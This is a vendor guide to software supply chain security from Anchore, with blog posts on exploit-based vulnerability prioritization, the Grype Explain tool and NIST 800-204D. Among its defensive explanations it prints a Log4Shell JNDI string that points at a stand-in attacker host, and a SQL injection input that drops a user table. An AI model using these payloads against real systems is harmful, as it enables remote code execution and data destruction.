The Complete Guide to Software Supply Chain Security

Two mega-trends, the containerization of applications and the rise of open-source software components, have dramatically increased the velocity of software delivery. This evolution, while offering significant benefits, has also introduced complexity and new challenges to traditional software supply chain security.

Anchore was founded on the belief that the legacy security solutions of the monolith era could be rebuilt to deliver on the promise of speed without sacrificing security. Anchore is trusted by Fortune 100 companies and the most exacting federal agencies across the globe because it has delivered on this promise.

If you’d like to learn more about how the Anchore Enterprise platform is able to accomplish this, feel free to book a time to speak with one of our specialists.

If you’re looking to get a better understanding of how software supply chains operate, where the risks lie and best practices on how to manage the risks, then keep reading.

An Overview of Software Supply Chains 

Before you can understand how to secure the software supply chain, it’s important to understand what the software supply chain is in the first place. A software supply chain is all of the individual software components that make up a software application. 

Software supply chains are similar to physical supply chains. When you purchase an iPhone all you see is the finished product. Behind the final product is a complex web of component suppliers whose parts are assembled to produce an iPhone. Displays and camera lenses from a Japanese company, CPUs from Arizona, modems from San Diego, batteries built with lithium from a Canadian mine; all of these pieces come together in a Shenzhen assembly plant to create a final product that is then shipped straight to your door. In the same way that an iPhone is made up of a screen, a camera, a CPU, a modem, and a battery, modern applications are composed of individual software components (i.e. dependencies) that are bundled together to create the finished product.

With the rise of open source software, most of these components are open source frameworks, libraries and operating systems. Specifically, 70-90% of modern applications are built utilizing open source software components. Before the ascent of open source software, applications were typically developed with proprietary, in-house code without a large and diverse set of software “suppliers”. In that environment the entire “supply chain” was made up of employees of a single company, which kept the complexity of managing all of these teams in check. The move to cloud-native and DevSecOps design patterns dramatically sped up the delivery of software, with the complication that the complexity of coordinating all of the open source software suppliers increased significantly.

This shift in the way software is developed impacts essentially all modern software. It means that businesses and government agencies are waking up to the realization that they are operating a software supply chain whether they want one or not.

One of the ways this new supply chain complexity is being tamed is with the software bill of materials (SBOM). A software bill of materials (SBOM) is a structured list of software components, modules, and libraries that are included in a given piece of software. Similar to the nutrition labels on the back of the foods that you buy, SBOMs are a list of ingredients that go into the software that your applications consume. We normally think of SBOMs as an artifact of the development process. As a developer is “manufacturing” their application using different dependencies they are also building a “recipe” based on the ingredients.
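
As a concrete illustration, an SBOM can be generated directly from a container image with an open source tool such as Anchore’s Syft; the image tag below is only an example:

❯ syft alpine:3.18 -o cyclonedx-json > sbom.json

Each component entry in the resulting file records a package name, version, and ecosystem: exactly the “ingredients list” described above.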

What is software supply chain security? 

Software supply chain security is the practice of finding vulnerabilities in the components that make up an application and preventing them from impacting the software that depends on them. Going back to the iPhone analogy from the previous section, in the same way that an attacker could target one of the iPhone suppliers to modify a component before the iPhone is assembled, a software supply chain threat actor could do the same but target an open source package that is then built into a commercial application.

Given the size and prevalence of open source software components in modern applications, the supply chain is only as secure as its weakest link. The image below of the iceberg is a somewhat overused meme of software supply chain security, but it is overused precisely because it explains the situation so well.

A different analogy is to view the open source software components that your application is built from as a pyramid. Your application’s supply chain is all of the open source components that your proprietary business logic is built on top of. The rub is that each of these components has its own pyramid of dependencies that it is built with. The foundation of your app might look solid, but there is always the potential that if you follow the dependency chain far enough down you will find a vulnerability that could topple the entire structure.
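
You can see this pyramid directly in most package managers. As an illustration (the application, package names, and versions below are hypothetical), listing a Node.js project’s full dependency tree shows how a single direct dependency fans out into many transitive ones:

❯ npm ls --all
my-app@1.0.0
└─┬ express@4.18.2
  ├─┬ body-parser@1.20.1
  │ ├── bytes@3.1.2
  │ └── ...
  └─┬ send@0.18.0
    └── ...

Every node in that tree is a potential weak link, even though only the top-level dependency was chosen deliberately.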

This gives adversaries their opening. A single compromised package allows attackers to manipulate all of the packages “downstream” of their entrypoint.

This reality was viscerally felt by the software industry (and all industries that rely on the software industry, meaning all industries) during the Log4j incident. 

Common Software Supply Chain Risks

Software development is a multifaceted process, encompassing various components and stages. From the initial lines of code to the final deployment in a production environment, each step presents potential risks for vulnerabilities to creep in. As organizations increasingly integrate third-party components and open-source libraries into their applications, understanding the risks associated with the software supply chain becomes paramount. This section delves into the common risks that permeate the software supply chain, offering insights into their origins and implications.

Source Code

Supply chain risks start with the code itself. Below are the most common risks associated with a software supply chain when generating custom first-party code:

  1. Insecure first-party code

Custom code is the first place to be aware of risk in the supply chain. If the code written by your developers isn’t secure then your application will be vulnerable at its foundation. Insecure code is any application logic that can be manipulated to perform a function that wasn’t originally intended by the developer.

For example, suppose a developer writes a login function that checks the user database to confirm that the submitted username and password match. If an attacker can craft a payload that instead causes the function to delete the entire user database, that is insecure code.
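
A minimal sketch of this classic pattern, SQL injection, is shown below; the database, table, and attacker input are all hypothetical:

❯ sqlite3 users.db "SELECT id FROM users WHERE name = '$NAME' AND pass = '$PASS';"

# If the attacker submits the name:  x'; DROP TABLE users; --
# the query becomes two statements, and the second one deletes the user table:
#   SELECT id FROM users WHERE name = 'x'; DROP TABLE users; --' AND pass = '...'

The remedy is to never splice untrusted input directly into a query string; parameterized queries avoid this class of bug entirely.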

  2. Source code management (SCM) compromise

Source code is typically stored in a centralized repository so that all of your developers can collaborate on the same codebase. An SCM is itself software and can be vulnerable in the same ways as your first-party code. If an adversary gains access to your SCM through a vulnerability in the software or through social engineering, they will be able to manipulate your source code at the foundation.

  3. Developer environments

Developer environments are powerful productivity tools for your engineers, but they are another potential fount of risk for an organization. Most integrated development environments come with a plug-in system so that developers can customize their workflows for maximum efficiency. These plug-in systems typically also have a marketplace associated with them. In the same way that a malicious Chrome browser plug-in can compromise a user’s laptop, a malicious developer plug-in can gain access to a “trusted” engineer’s development system and piggyback on this trusted access to manipulate the source code of an application.

3rd-Party Dependencies (Open source or otherwise)

Third-party software is really just first-party software written by someone else, in the same way that the cloud is just servers run by someone else. Third-party software dependencies are potentially subject to all of the same risks as your own first-party code in the above section, but since it isn’t your code you have to deal with the risks in a different way. Below we lay out the two risks associated with third-party software:

  1. Known vulnerabilities (CVEs, etc)

Known vulnerabilities are insecure or malicious code that has been identified in a third-party dependency. Typically the maintainer of a third-party dependency will fix their insecure code when they are notified and publish an update. Sometimes, if the vulnerability isn’t a priority, they won’t address it for a long time (if ever). If your developers rely on this dependency for your application, then you have to assume the risk.
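
Detecting known vulnerabilities is well served by open source tooling. For example, Anchore’s Grype (covered later in this guide) compares an image’s dependencies against public vulnerability databases; the image tag below is only an example:

❯ grype python:3.8-slim
# reports each vulnerable package alongside its CVE or GHSA identifier, its
# severity, and the fixed-in version when the maintainer has published one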

  2. Unknown vulnerabilities (zero-days)

Unknown vulnerabilities are insecure or malicious code that hasn’t been discovered yet. These vulnerabilities can lie dormant in a codebase for months, years or even decades. When they are finally uncovered and announced, there is typically a scramble across the world by any business that uses software (i.e. almost all businesses) to figure out whether they utilize the dependency and how to protect themselves from having it be exploited. Attackers scramble as well, determining who is using the vulnerable software and crafting exploits to take advantage of businesses that are slow to react.

Build Pipeline & Artifact Repository

  1. Build pipeline compromise

A software build pipeline is a system that pulls the original source code from an SCM, pulls all of the third-party dependencies from their source repositories, and then creates and optimizes the code into a binary that can be stored in an artifact repository. Like an SCM, it is itself software composed of both first- and third-party code, which means it carries all of the same risks to its source code and software dependencies.
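
Stripped of vendor specifics, the pipeline described above boils down to a handful of steps. The sketch below is illustrative; the repository URL and image names are hypothetical:

❯ git clone https://scm.example.com/org/app.git && cd app   # pull first-party source from the SCM
❯ npm ci                                                    # pull third-party dependencies from their registries
❯ npm run build                                             # compile and optimize into a deployable artifact
❯ docker build -t registry.example.com/app:1.0 .            # package the artifact as a container image
❯ docker push registry.example.com/app:1.0                  # store it in the artifact registry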

Organizations deal with these risks differently than the developers of the build systems because they do not control this code. Instead the risks are around managing who has access to the build system and what they can do with their access. Risks range from modifying where the build system is pulling source code from to modifying the build instructions to inject malicious or vulnerable code into previously secure source.

  2. Artifact registry compromise

An artifact registry is a centralized repository of fully built applications (typically in the format of a container image) from which a deployment orchestrator pulls software in order to run it in a production environment. Like a build pipeline or SCM, it is itself software and carries the same associated risks mentioned before.

Typically, the risks of registries are managed through how trust is established between the registry and the build system or any other system/person that has access to it. Risks range from an attacker poisoning the registry with an untrusted container to an attacker gaining privileged access to the repository and modifying a container in place.

Production

  1. Deployment orchestrator compromise

A deployment orchestrator is a system that pulls pre-built software binaries and runs the applications on servers. It is another type of software system similar to a build pipeline or SCM and has the same associated risks as mentioned before.

Typically, the risks of orchestrators are managed through trust relationships between the orchestrator and the artifact registry or any other system/person that has access to it. Risks range from an attacker manipulating the orchestrator into deploying an untrusted container to an attacker gaining privileged access to the orchestrator and modifying a running container or manifest.

  2. Production environment compromise

The production environment is the application running on a server after being deployed by an orchestrator. It is the software system built from the original source code that fulfills users’ requests; the final product of the software supply chain. Its risks differ from those of most other systems because it typically serves users outside of the organization, and far less is known about external users than internal ones.

Examples of software supply chain attacks

As reliance on third-party components and open-source libraries grows, so does the potential for vulnerabilities in the software supply chain. Several notable incidents have exposed these risks, emphasizing the need for proactive security and a deep understanding of software dependencies. In this section, we explore significant software supply chain attacks and the lessons they impart.

SolarWinds (2020)

In one of the most sophisticated supply chain attacks, malicious actors compromised the update mechanism of SolarWinds’ Orion software. This breach allowed the attackers to distribute malware to approximately 18,000 customers. The attack had far-reaching consequences, affecting numerous government agencies, private companies, and critical infrastructure.

Lessons Learned: The SolarWinds attack underscored the importance of securing software update mechanisms and highlighted the need for continuous monitoring and validation of software components.

Log4j (2021)

In late 2021, a critical vulnerability was discovered in the Log4j logging library, a widely used Java-based logging utility. Dubbed “Log4Shell,” this vulnerability allowed attackers to execute arbitrary code remotely, potentially gaining full control over vulnerable systems. Given the ubiquity of Log4j in various software applications, the potential impact was massive, prompting organizations worldwide to scramble for patches and mitigation strategies.
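
For context, the exploit hinged on a single string pattern. If a vulnerable log4j-core logged attacker-controlled input like the line below (the hostname is illustrative), the library would perform a JNDI lookup against an attacker-controlled LDAP server and execute the code it returned:

${jndi:ldap://attacker.example.com/a}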

Lessons Learned: The Log4j incident underscored the risks associated with ubiquitous open-source components. It highlighted the importance of proactive vulnerability management, rapid response to emerging threats, and the need for organizations to maintain an updated inventory of third-party components in their software stack.

NotPetya (2017)

Originating from the compromised software update mechanism of a Ukrainian accounting software package, NotPetya spread rapidly across the globe. Masquerading as ransomware, its primary intent was data destruction. Major corporations, including Maersk, FedEx, and Merck, faced disruptions, leading to financial losses amounting to billions.

Lessons Learned: NotPetya highlighted the dangers of nation-state cyber warfare and the need for robust cybersecurity measures, even in seemingly unrelated software components.

Node.js Packages coa and rc

In November 2021, two widely-used npm packages, coa and rc, were compromised. Malicious versions of these packages were published to the npm registry, attempting to run a script to access sensitive information from users’ .npmrc files. The compromised versions were downloaded thousands of times before being identified and removed.

Lessons Learned: This incident emphasized the vulnerabilities in open-source repositories and the importance of continuous monitoring of dependencies. It also highlighted the need for developers and organizations to verify the integrity of packages before installation and to be wary of unexpected package updates.

JuiceStealer Malware

JuiceStealer is a malware spread through a technique known as typosquatting on the PyPI (Python Package Index). Malicious packages were seeded on PyPI, intending to infect users with the JuiceStealer malware, designed to steal sensitive browser data. The attack involved a complex chain, including phishing emails to PyPI developers.

Lessons Learned: JuiceStealer showcased the risks of typosquatting in package repositories and the importance of verifying package names and sources. It also underscored the need for repository maintainers to have robust security measures in place to detect and remove malicious packages promptly.

Node.js Packages colors and faker

In January 2022, the developer behind popular npm libraries colors and faker intentionally sabotaged both packages in an act of “protestware.” This move affected thousands of applications, leading to broken builds and potential security risks. The compromised versions were swiftly removed from the npm registry.

Lessons Learned: This incident highlighted the potential risks associated with relying heavily on open-source libraries and the actions of individual developers. It underscored the importance of diversifying dependencies, having backup plans, and the need for the open-source community to address developer grievances constructively.

Standards and Best Practices for Preventing Attacks

There are a number of different initiatives to define best practices for software supply chain security. Organizations ranging from the National Institute of Standards and Technology (NIST) to the Cloud Native Computing Foundation (CNCF) to the Open Source Security Foundation (OpenSSF) have created fantastically detailed documentation on their recommendations to achieve an optimally secure supply chain.

Adopting any of these standards is better than adopting none; you can even cherry-pick from each of the standards to create a program that is best tailored to the risk profile of your organization. If you’d prefer to stick to one for simplicity’s sake and need some help deciding, Anchore has detailed our thoughts on the pros and cons of each software supply chain standard here.

Below is a concise summary of each of the major standards to help get you started:

National Institute of Standards and Technology (NIST)

NIST has a few different standards that are worth noting. We’ve ordered them from the broadest to the most specific and, coincidentally, chronologically as well.

NIST SP 800-53, “Security and Privacy Controls for Information Systems and Organizations”

NIST 800-53, aka the Control Catalog, is the granddaddy of NIST security standards. It has had a long life and evolved alongside the security landscape. Typically paired with NIST 800-37, the Risk Management Framework or RMF, this pair of standards creates a one-two punch that not only produces a highly secure environment for protecting classified and confidential information but also sets up organizations to more easily comply with federal compliance standards like FedRAMP.

Software supply chain security (SSCS) topics first began filtering into NIST 800-53 in 2013, but it wasn’t until 2020 that the Control Catalog was updated to break out SSCS into its own section. If your concern is to get up and running with SSCS as quickly as possible, then this standard will be overkill. If your goal is to build toward FedRAMP and NIST 800-53 compliance as well as build a secure software development process, then this standard is for you. If you’re looking for something more specific, one of the next two standards might be for you.

If you need a comprehensive guide to NIST 800-53 or its spiritual sibling, NIST 800-37, we have put together both. You can find a detailed but comprehensible guide to the Control Catalog here and the same plain-English, deep-dive treatment of NIST 800-37 here.

NIST SP 800-161, “Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations”

NIST 800-161 is an application of both the RMF and the Control Catalog to supply chain security specifically. Its controls take the base controls from NIST 800-53 and add guidance on how to achieve more specific supply chain outcomes. For the framework, NIST 800-161 takes the generic RMF and creates a version that is tailored to SSCS.

NIST 800-161 is a comprehensive standard that will guide your organization to create a development process with its primary output being highly secure software and systems. 

NIST SP 800-218, “Secure Software Development Framework (SSDF)”

NIST 800-218, the SSDF, is an even more refined standard than NIST 800-161. The SSDF targets the software developer as the audience and gives even more tailored recommendations on how to create secure software systems.

If you’re a developer attempting to build secure software that complies with all of these standards, we have an ongoing blog series that breaks down the individual controls that are part of the SSDF.

NIST SP 800-204D, “Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines”

Focused specifically on Cloud-native architectures and Continuous Integration/Continuous Delivery (CI/CD) pipelines, NIST 800-204D is a significantly more specific standard than any of the previous standards. That being said, if the primary insertion point for software supply chain security in your organization is via the DevOps team then this standard will have the greatest impact on your overall software supply chain security.

Also, it is important to note that this standard is still a draft and will likely change as it is finalized.

Open Source Security Foundation (OpenSSF)

A project of the Linux Foundation, the Open Source Security Foundation is a cross-industry organization that focuses on the security of the open source ecosystem. Since most third-party dependencies are open source, the foundation carries a lot of weight in the software supply chain security domain.

Supply-chain Levels for Software Artifacts (SLSA)

If an SBOM is an ingredients label for a product, then SLSA (pronounced ‘salsa’) is the set of food safety handling guidelines for the factory where it is produced. It focuses primarily on updating traditional DevOps workflows with signed attestations about the quality of the software that is produced.

Google originally donated the framework; it has been using an internal version of SLSA since 2013 and requires it for all of its production workloads.

You can view the entire framework on its dedicated website here.

Secure Supply Chain Consumption Framework (S2C2F) 

The S2C2F is similar to SLSA but much broader in scope. It gives recommendations covering the security of the entire software supply chain, including traditional security practices such as scanning for vulnerabilities. It touches on signed attestations, but not at the same level of depth as SLSA.

The S2C2F was built and donated by Microsoft, where it has been used and refined internally since 2019.

You can view the entire list of recommendations on its GitHub repository.

Cloud Native Computing Foundation (CNCF)

The CNCF is also a project of the Linux Foundation but is focused on the entire ecosystem of open-source, cloud-native software. The Security Technical Advisory Group at the CNCF has a vested interest in supply chain security because the majority of the software that is incubated and matured at the CNCF is part of the software development lifecycle.

Software Supply Chain Best Practices White Paper

The Security Technical Advisory Group at the CNCF created a best practices white paper that was heralded as a huge step forward for the security of software supply chains. The document’s creation was led by the CTO of Docker and the Chief Open Source Officer at Isovalent, and it captures over 50 recommended practices to secure the software supply chain.

You can view the full document here.

Types of Supply Chain Compromise

This document isn’t a standard or a set of best practices; instead, it supports the best practices white paper by defining a full list of supply chain compromises.

Catalog of Supply Chain Compromises

This isn’t a standard or best practices document either. It is instead a detailed history of the significant supply chain breaches that have occurred over the years, and it is helpful for understanding the history that informed the best practices detailed in the accompanying white paper.

How Anchore Can Help 

Anchore is a leading software supply chain security company that has built a modern, SBOM-powered software composition analysis (SCA) platform that helps organizations incorporate many of the software supply chain best practices that are defined in the above guides.

As we have learned working with Fortune 100 enterprises and federal agencies, including the Department of Defense, an organization’s supply chain security can only be as good as the depth of their data on their supply chain and the automation of processing the raw data into actionable insights. Anchore Enterprise provides an end-to-end software supply chain security system with total visibility, deep inspection, automated enforcement, expedited remediation and trusted reporting to deliver the actionable insights to make a supply chain as secure as possible.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists.

Detecting Exploits within your Software Supply Chain

SBOMs. What are they good for? At Anchore, we see SBOMs (software bills of materials) as the foundation of an application’s supply chain hierarchy. Upon this foundation you can build a lot of powerful features, such as the ability to detect vulnerabilities in your open source dependencies before they are pushed to production. An unintended side effect of giving users the power to easily see deeply into their application’s dependencies and detect the vulnerabilities in those dependencies is that there can sometimes be hundreds of vulnerabilities discovered in the process.

We’ve seen customer applications that generate 400+ known vulnerabilities! This creates an information overload that typically ends with the application developer ignoring the results because it is too much effort to triage and remediate each one. Knowing that an application is riddled with vulnerabilities is better than not knowing, but excessive information does not lead to actionable insights.

Anchore Enterprise solves this challenge by pairing vulnerability data (e.g., CVEs) with exploit data (e.g., the KEV Catalog). By combining these two data sources we can create actionable insight, showing users both the vulnerabilities in their applications and which of those vulnerabilities are actually being exploited. Actively exploited vulnerabilities are significantly higher risk and can be prioritized for triage and remediation first. In this blog post, we’ll discuss how we do that and how it can save both your security team and application developers time.

How Does Anchore Enterprise Help You Find Exploits in Your Application Dependencies?

What is an Exploited Vulnerability?

“Exploited” is an important distinction because it means that not only does a vulnerability exist but a payload also exists that can reliably trigger the vulnerability and cause an application to execute unintended functionality (e.g., leaking or deleting the entire contents of a database). For instance, almost all bank vaults in the world are vulnerable to an asteroid strike “deleting” the contents of the safe, but no one has developed a system to reliably cause an asteroid to strike bank vaults. Maybe Elon Musk can make this happen in a few more years, but today this vulnerability isn’t exploitable. It is important for organizations to prioritize exploited vulnerabilities because the potential for damage is significantly greater.

Source High-Quality Data on Exploits

In order to find vulnerabilities that are exploitable, you need high-quality data from security researchers who are either crafting exploits for known vulnerabilities or analyzing attack data for payloads that trigger an exploit in a live application. Thankfully, there are two exceedingly high-quality databases that publish this information publicly and regularly: the Known Exploited Vulnerabilities (KEV) Catalog and the Exploit Database (Exploit-DB).

The KEV Catalog is a database of known exploited vulnerabilities that is published and maintained by the US government through the Cybersecurity and Infrastructure Security Agency (CISA). It is updated regularly; CISA typically adds 1-5 new KEVs every week.

While not an exploit database itself, the National Vulnerability Database (NVD) is an important source of exploit data because it checks all of the vulnerabilities that it publishes and maintains against the Exploit-DB and embeds the relevant identifiers when a match is found.
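
Both feeds are publicly consumable. As an illustration, the KEV Catalog is published as a JSON document that can be queried with standard tools; the URL and field names below reflect the feed at the time of writing:

❯ curl -s https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json \
    | jq -r '.vulnerabilities[] | [.cveID, .dateAdded, .vulnerabilityName] | @tsv'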

Anchore Enterprise ingests both of these data feeds and stores the data in a centralized repository. Once this data is structured and available to your organization it can then be used to determine which applications and their associated dependencies are exploitable.

Map Data on Exploits to Your Application Dependencies

Now that you have a quality source of data on known exploited vulnerabilities, you need to determine whether any of these exploits exist in your applications and/or the dependencies that they are built with. The industry-standard method for storing information on applications and their dependency supply chain is a software bill of materials (SBOM).

After you have an SBOM for your application you can then cross-reference the dependencies against both a list of known vulnerabilities and a list of known exploited vulnerabilities. The output of this is a list of all of the applications in your organization that are vulnerable to exploits.

If done manually, via something like a spreadsheet, this can quickly become a tedious process. Anchore Enterprise automates this process by generating SBOMs for all of your applications and running scans of the SBOMs against vulnerability and exploit databases.
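
For a sense of what this automation looks like, the same workflow can be sketched with Anchore’s open source tools: generate an SBOM once with Syft, then re-scan that stored SBOM with Grype as the vulnerability data changes. The image name below is hypothetical:

❯ syft registry.example.com/app:1.0 -o json > app-sbom.json   # generate the SBOM once at build time
❯ grype sbom:./app-sbom.json                                  # re-scan the stored SBOM against fresh vulnerability data

Because the SBOM is stored, the scan can be re-run whenever the vulnerability or exploit feeds update, without rebuilding the application.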

How Does Anchore Enterprise Help You Prioritize Remediation of Exploits in Your Application Dependencies?

Once we’ve used Anchore Enterprise to detect CVEs in our containers that are also exploitable according to the KEV or Exploit-DB lists, we can weigh the severity score against more contextual evidence. We need to know two things for each finding: what is its severity, and can we accept the risk associated with leaving that vulnerable code in our application or container?

If we look back to the Log4j event in December of 2021, that particular vulnerability scored a 10 on the CVSS scale. That score alone provides little detail on how dangerous the vulnerability is. If a CVE is filed against any given piece of software and the NVD researchers cannot reach the authors of the code, it is assigned a score of 10 and the worst case is assumed.

However, if we have applied our KEV and Exploit-DB bundles and determined that we do indeed have a critical vulnerability with active known exploits and evidence that it is being exploited in the wild, AND the severity exceeds our personal or organizational risk thresholds, then we know that we need to take action immediately.

Everyone has questioned the utility of the SBOM, but Anchore Enterprise is making this question an afterthought. Moving past the basics of generating an SBOM and detecting CVEs, Anchore Enterprise automatically maps exploit data to specific packages in your software supply chain, allowing you to generate reports and notifications for your teams. By analyzing this higher quality information, you can determine which vulnerabilities actually pose a threat to your organization and in turn make more intelligent decisions about which to fix and which to accept, saving your organization time and money.

Wrap Up

Returning to our original question: what are SBOMs good for? It turns out the answer is scaling the process of finding and prioritizing vulnerabilities in your organization’s software supply chain.

In today’s increasingly complex software landscape, the importance of securing your application’s supply chain cannot be overstated. Traditional SBOMs have empowered organizations to identify vulnerabilities but often left them inundated with too much information, rendering the data less actionable. Anchore Enterprise revolutionizes this process by not only automating the generation of SBOMs but also cross-referencing them against reputable databases like the KEV Catalog and Exploit-DB to isolate actively exploited vulnerabilities. By focusing on the vulnerabilities that are actually being exploited in the wild, your security team can prioritize remediation efforts more effectively, saving both time and resources.

Anchore Enterprise moves beyond merely detecting vulnerabilities to providing actionable insights, enabling organizations to make intelligent decisions on which risks to address immediately and which to monitor. Don’t get lost in the sea of vulnerabilities; let Anchore Enterprise be your compass in navigating the choppy waters of software security.

If you’d like to learn more about the Anchore Enterprise platform or speak with a member of our team, feel free to book a time to speak with one of our specialists.

Introducing Grype Explain

Since releasing Grype 3 years ago (in September 2020), one of the most frequent questions we’ve gotten is, “why is image X vulnerable to vulnerability Y?” Today, we’re introducing a new sub-command to help users answer this question: Grype Explain.

Now, when users are surprised to see some CVE they’ve never heard of in their Grype output, they can ask Grype to explain itself: grype -o json alpine:3.7 | grype explain --id CVE-2021-42374. We’re asking the community to please give it a try, and if you have feedback or questions, let us know.

The goal of Grype Explain is to help operators evaluate a reported vulnerability so that they can decide what, if any, action to take. To demonstrate, let’s look at a simple scenario.

First, an operator who deploys a file called fireline.hpi into production sees some vulnerabilities:

❯ grype fireline.hpi | grep Critical

✔ Vulnerability DB                [no update available]
✔ Indexed file system
✔ Cataloged packages              [35 packages]
✔ Scanned for vulnerabilities     [36 vulnerabilities]
├── 10 critical, 14 high, 9 medium, 3 low, 0 negligible
└── 14 fixed

bcel                 6.0-SNAPSHOT  6.6.0     java-archive    GHSA-97xg-phpr-rg8q  Critical
commons-collections  3.1           3.2.2     java-archive    GHSA-fjq5-5j5f-mvxh  Critical
dom4j                1.6.1         2.0.3     java-archive    GHSA-hwj3-m3p6-hj38  Critical
fastjson             1.2.9         1.2.31    java-archive    GHSA-xjrr-xv9m-4pw5  Critical
fastjson             1.2.9                   java-archive    CVE-2022-25845       Critical
fastjson             1.2.9                   java-archive    CVE-2017-18349       Critical
log4j-core           2.11.1        2.12.2    java-archive    GHSA-jfh8-c2jp-5v3q  Critical
log4j-core           2.11.1        2.12.2    java-archive    GHSA-7rjr-3q55-vv33  Critical
log4j-core           2.11.1                  java-archive    CVE-2021-45046       Critical
log4j-core           2.11.1                  java-archive    CVE-2021-44228       Critical

Wait, isn’t CVE-2021-44228 log4shell? I thought we patched that! The operator asks for an explanation of the vulnerability:

❯ grype -q -o json fireline.hpi | grype explain --id CVE-2021-44228

[0000]  WARN grype explain is a prototype feature and is subject to change

CVE-2021-44228 from nvd:cpe (Critical)

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1)
JNDI features used in configuration, log messages, and parameters do not protect against attacker
controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log
message parameters can execute arbitrary code loaded from LDAP servers when message lookup
substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From
version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely
removed. Note that this vulnerability is specific to log4j-core and does not affect log4net,
log4cxx, or other Apache Logging Services projects.

Related vulnerabilities:
    - github:language:java GHSA-jfh8-c2jp-5v3q (Critical)
Matched packages:
    - Package: log4j-core, version: 2.11.1
      PURL: pkg:maven/org.apache.logging.log4j/[email protected]
      Match explanation(s):
          - github:language:java:GHSA-jfh8-c2jp-5v3q Direct match (package name, version, and
            ecosystem) against log4j-core (version 2.11.1).
          - nvd:cpe:CVE-2021-44228 CPE match on `cpe:2.3:a:apache:log4j:2.11.1:*:*:*:*:*:*:*`.
      Locations:
          - /fireline.hpi:WEB-INF/lib/fireline.jar:lib/firelineJar.jar:log4j-core-2.11.1.jar
URLs:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

Right away this gives us some information an operator might need:

  • Where’s the vulnerable file?
    • /fireline.hpi:WEB-INF/lib/fireline.jar:lib/firelineJar.jar:log4j-core-2.11.1.jar
    • The nested path tells the operator that a jar inside a jar inside the .hpi file is responsible for the vulnerability.
  • How was it matched?
    • Seeing both a CPE match on cpe:2.3:a:apache:log4j:2.11.1:*:*:*:*:*:*:* and a GHSA match on pkg:maven/org.apache.logging.log4j/[email protected] gives the operator confidence that this is a real match. 
  • What’s the URL where I can read more about it?
    • Links to the NVD and GHSA sites for the vulnerability are printed out so the operator can easily learn more.

Based on this information, the operator can assess the severity of the issue, and know what to patch.

We hope that Grype Explain will help users better understand and respond faster to vulnerabilities in their applications. Do you have feedback on how Grype Explain could be improved? Please let us know!


NIST’s Comprehensive Approach to Software Supply Chain Security

The National Institute of Standards and Technology (NIST) has always been at the forefront of setting benchmarks and standards for industry. They recently released a draft publication, 800-204D, titled “Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines.” This document is exciting as it’s a testament to their commitment to evolving with the times and addressing challenges with supply chain security.

It should be noted that this document is currently a draft. NIST is seeking feedback from stakeholders in order to write the final version. Anyone who has input on this topic can and should contribute suggestions. NIST guidance is not produced in a bubble; it’s important that we all help collaborate on these documents.

Understanding the Significance of the Supply Chain

Before we explain the purpose of the document, it’s important to understand the software supply chain’s complexity. When we think of “supply chain” we have historically imagined lines of code, software packages, and developer tools. However, it’s a complex system that spans the foundational hardware, the operating systems that run on it, the developer workstations where software is crafted, and even the systems that distribute our software to users worldwide. Each node in this chain presents unique security challenges.

A great deal of previous guidance has been heavily focused on the development and procurement of software that goes into products. NIST 800-204D is a document that focuses on continuous integration and continuous delivery (CI/CD) systems. The security of a CI/CD system is no less important than the security of the packages that go into your software.

NIST’s Holistic Approach

With 800-204D, NIST isn’t merely adding another document to the pile. NIST recently released 800-218, the Secure Software Development Framework, and maintains 800-53, the granddaddy of most other cybersecurity compliance frameworks. NIST is signaling that it wants to advance how the industry approaches software supply chain security. In this instance, by emphasizing CI/CD pipelines, NIST is highlighting the importance of the processes that drive software development and deployment, rather than just the end product.

While there’s no shortage of guidance on CI/CD pipelines, much of the existing literature is either outdated or too narrow in scope. This is where NIST’s intervention should make us pay attention. Their comprehensive approach ensures that every aspect of the software supply chain, from code creation to deployment, is under scrutiny.

Comparing with Existing Content

The CNCF supply chain security white paper serves as an example. A few years ago, this document was hailed as a significant step forward. It provided a detailed overview of supply chain concerns and offered solutions to secure them. However, the document hasn’t seen an update in over two years. The tech landscape is ever-evolving. What was relevant two years ago might not hold today. This rapid evolution underscores the need for regularly updated guidance.

Maintaining and updating such comprehensive documents is no small feat. It requires expertise, resources, and a commitment to staying on top of industry developments. NIST, who has been providing guidance like this for decades, is uniquely positioned to take on this challenge. Their track record of maintaining and updating documents over extended periods is unparalleled.

The Promise of Modern Initiatives

Modern projects like SLSA and S2C2F have shown promise. They represent the industry’s proactive approach to addressing supply chain security challenges. However, they face inherent challenges that NIST does not. The lack of consistent funding and a clear mandate means that their future is less certain than a NIST document. Key personnel changes, shifts in organizational priorities, or a myriad of other factors could unexpectedly derail their progress.

NIST, with its government backing, doesn’t face these challenges. NIST guidance is not only assured of longevity but also of regular updates to stay relevant. This longevity ensures that even as projects like SLSA or S2C2F evolve or new initiatives emerge, there’s a stable reference point that the industry can rely on. Of course, something becoming a NIST standard doesn’t solve all problems; sometimes NIST guidance can become outdated and isn’t updated as often as it should be. Given the rash of government mandates around security lately, though, this is not expected to happen for supply chain related guidance.

The NIST Advantage

NIST’s involvement goes beyond just providing guidance. Their reputation and credibility mean that their publications carry significant weight. Organizations, both public and private, pay attention when NIST speaks. The guidance NIST has been providing to the United States since its inception has helped the industry in countless ways. Everything from safety, to measurements, even keeping our clocks running! This influence ensures that best practices and recommendations are more likely to be adopted, leading to a more secure and robust software supply chain.

However, it’s essential to temper expectations. While NIST’s guidance is invaluable, it’s not magic. Some NIST standards become outdated, some are difficult for small businesses or individuals to follow, and not all recommendations can be universally applicable. However, given the current global focus on supply chain security, we can expect NIST to be proactive in updating this guidance.

It should also be noted that NIST guidance has a feedback mechanism. In the case of 800-204D, the document is a draft. NIST wants feedback, and the document will change between the current draft and the final version. Good feedback is a way we can all help ensure the guidance is high quality.

Looking Ahead

